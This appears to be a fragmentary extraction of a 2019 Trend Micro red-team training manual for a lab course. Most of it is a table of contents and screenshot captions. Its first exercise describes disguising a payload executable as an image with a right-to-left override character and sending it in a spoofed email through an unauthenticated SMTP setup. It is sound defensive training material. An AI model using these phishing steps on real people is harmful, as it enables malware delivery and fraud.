Cybercrime & Attack Methodologies Workshop Manual v3-2

Uploaded by

Copyright:

Available Formats

Advanced Threat Defense

Cybercrime Operations & Attack

Author: ATD Taskforce

Released: December 19, 2019

Point of Entry .................................................................................................... 13

Command & Control ..........................................................................................23

Lateral Movement ............................................................................................. 35

Final Challenge ..............................................................................................99

Appendix A: Optional Activities ........................................................................ 105

Appendix B: Commands & Parameters ................................................................... 113

© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 3

Pupy ............................................................................................................................................ 115

Appendix C: Table of Contents ......................................................................... 123

4 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential

It also contains information about all pre-requisites, if required.

© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 5

6 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential

About this Book

Trend Micro Training Cloud Access

Invitation email : example

© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 7

3. On the “Training Area” page, click[Enter Training] icon.

TREND MICRO TRAINING CLOUD ACCESS: LIST OF all Trainings

5. Make sure that the [Lab View] window appears.

TREND MICRO TRAINING CLOUD ACCESS: Lab View

8 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential

CLASS SETUP: VIRTUAL ENVIRONMENT

Virtual Machine Description

Virtual Machine / Account Username Password

© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 9

Accessing the Virtual Machines

ACCESSING THE VIRTUAL MACHINES: OPEN THE VAPP

ACCESSING THE VIRTUAL MACHINES: “Remote Control” Icon

10 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential

© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 11

12 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential

© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 13

14 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential

Exercise 1: Spoof-Email with malicious Attachment

> Preparing the Malicious Attachment

6. On the second line, type the following:

PREPARING EMAIL: PREPARING RTLO

PREPARING EMAIL: PLACING RTLO CHARACTER

© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 15

9. The text flips horizontally, forming the word rcs.omedeenshot.jpg:

PREPARING EMAIL: TEXT CHANGES WITH RTLO APPLIED

10. Place the cursor between rcs.omed and eenshot.jpg:

PREPARING EMAIL: SET LOCATION FOR LTRO CHARACTER

PREPARING EMAIL: TEXT CHANGES WITH LTRO APPLIED

16 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential

PREPARING EMAIL: RENAME PAYLOAD.EXE

18. The file will be renamed to gpj.tohsneedemo.scr, but it will be displayed as

PREPARING EMAIL: FILE RENAMED

PREPARING EMAIL: CHANGE VIEW OF WINDOWS EXPLORER

© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 17

> Send a spoofed Email

SENDING EMAIL: ACCOUNT SELECTION

3. On the Accounts section, select View settings for this account:

SENDING EMAIL: VIEWING ACCOUNT SETTINGS

4. Click Outgoing Server (SMTP):

SENDING EMAIL: OUTGOING MAIL SERVER SETTINGS

5. Click “Edit” and set the Authentication method to “No Authentication”:

SENDING EMAIL: CONFIRM SMTP SETTINGS